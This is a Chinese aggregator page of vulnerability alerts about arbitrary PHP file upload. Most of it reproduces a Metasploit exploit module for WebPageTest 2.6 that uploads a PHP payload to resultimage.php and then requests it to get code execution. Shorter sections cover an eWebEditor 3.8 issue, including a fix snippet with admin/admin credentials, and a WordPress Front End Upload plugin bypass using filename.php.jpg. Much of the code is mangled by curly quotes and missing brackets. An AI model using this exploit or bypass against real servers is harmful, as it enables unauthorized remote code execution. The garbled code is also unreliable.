首页 > 范文大全

WebPageTest任意php文件上传漏洞预警

时间：2024年04月09日

来源：万川人

编辑：本站小编

收藏本文

下载本文

以下是小编为大家准备的WebPageTest任意php文件上传漏洞预警，本文共5篇，仅供参考，大家一起来看看吧。本文原稿由网友“万川人”提供。

篇1：WebPageTest任意php文件上传漏洞预警

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})

super(update_info(info,

'Name' =>“WebPageTest Arbitrary PHP File Upload”,

'Description' =>%q{

This module exploits a vulnerability found in WebPageTest's Upload Feature. By

default, the resultimage.phpfile does not verify the user-supplied item before

saving it to disk, and then places this item in the web directory accessable by

remote users. This flaw can be abused to gain remote code execution.

'License' =>MSF_LICENSE,

'Author' =>

[

'dun', #Discovery, PoC

'sinn3r' #Metasploit

'References' =>

[

['OSVDB', '83822'],

['EDB', '19790']

'Payload' =>

{

'BadChars' =>“\\x00”

'DefaultOptions' =>

{

'ExitFunction' =>“none”

'Platform' =>['php'],

'Arch' =>ARCH_PHP,

'Targets' =>

[

['WebPageTest v2.6 or older', {}]

'Privileged' =>false,

'DisclosureDate' =>“Jul 13 ”,

'DefaultTarget' =>0))

register_options(

[

OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])

], self.class)

end

def check

peer = “#{rhost}:#{rport}”

target_uri.path << '/' if target_uri.path[-1,1] != '/'

base = File.dirname(“#{target_uri.path}.”)

res1 = send_request_raw({'uri'=>“#{base}/index.php”})

res2 = send_request_raw({'uri'=>“#{base}/work/resultimage.php”})

if res1 and res1.body =~ /WebPagetest \\- Website Performance and Optimization Test/ and

res2 and res2.code == 200

return Exploit::CheckCode::Vulnerable

end

return Exploit::CheckCode::Safe

end

def on_new_session(cli)

if cli.type != “meterpreter”

print_error(“No automatic cleanup for you. Please manually remove: #{@target_path}”)

return

end

cli.core.use(“stdapi”) if not cli.ext.aliases.include?(“stdapi”)

cli.fs.file.rm(@target_path)

print_status(“#{@target_path} removed”)

end

def exploit

peer = “#{rhost}:#{rport}”

target_uri.path << '/' if target_uri.path[-1,1] != '/'

base = File.dirname(“#{target_uri.path}.”)

p = payload.encoded

fname = “blah.php”

data = Rex::MIME::Message.new

data.add_part(

“

'multipart/form-data', #Content Type

nil, #Transfer Encoding

”form-data; name=\\“file\\”; filename=\\“#{fname}\\”“ #Content Disposition

)

print_status(”#{peer} - Uploading payload (#{p.length.to_s} bytes)...“)

res = send_request_cgi({

'method' =>'POST',

'uri' =>”#{base}/work/resultimage.php“,

'ctype' =>”multipart/form-data; boundary=#{data.bound}“,

'data' =>data.to_s

})

if not res

print_error(”#{peer} - No response from host“)

return

end www.xxxxo.com

@target_path = ”#{base}/results/#{fname}“

print_status(”#{peer} - Requesting #{@target_path}“)

res = send_request_cgi({'uri'=>@target_path})

handler

if res and res.code == 404

print_error(”#{peer} - Payload failed to upload“)

end

篇2：eWebeditoR3.8 for php任意文件上传EXP漏洞预警

eWebeditoR3.8 for php任意文件上EXP

URL:

file:

漏洞修补方法：

初始化数组$aStyle

$sUsername = ”admin“;

$sPassword = ”admin“;

$aStyle. = array();

$aStyle[1] = ”gray|||gray|||office|||../uploadfile/|||550|||350|||rar|zip|exe|doc|xls|chm|hlp|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office标准风格，部分常用按钮，标准适合界面宽度|||1|||zh-cn|||0|||500|||300|||0|||版权所有...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1|||1“;

篇3：WordPress Front End Upload v0.5.4.4任意php文件上传漏洞预警

标题: WordPress Front End Upload v0.5.4.4 Arbitrary PHP File Upload Vulnerability

作者: Chris Kellum

主页: mondaybynoon.com/

软件地址: downloads.wordpress.org/plugin/front-end-upload.0.5.4.4.zip

影响版本: 0.5.4.4

缺陷分析

=====================

Plugin does not properly filter filetypes, which allows for the upload of filetypes in the following format:

filename.php.jpg

Vulnerable hosts will serve such files as a php file, allowing for malicious files to be uploaded and executed.

In creating the uploads folder for this plugin, the code utilizes uniqid to add a unique string to the upload folder name in order to better hide it from direct access.

Example:

www.xxxx.com/wp-content/uploads/feu_9fc12558ac71e6995808cfc590207e87/

However, many WordPress installations allow direct access to the /wp-content/uploads/ folder, so simply look for a folder name beginning with 'feu_' to locate your upload.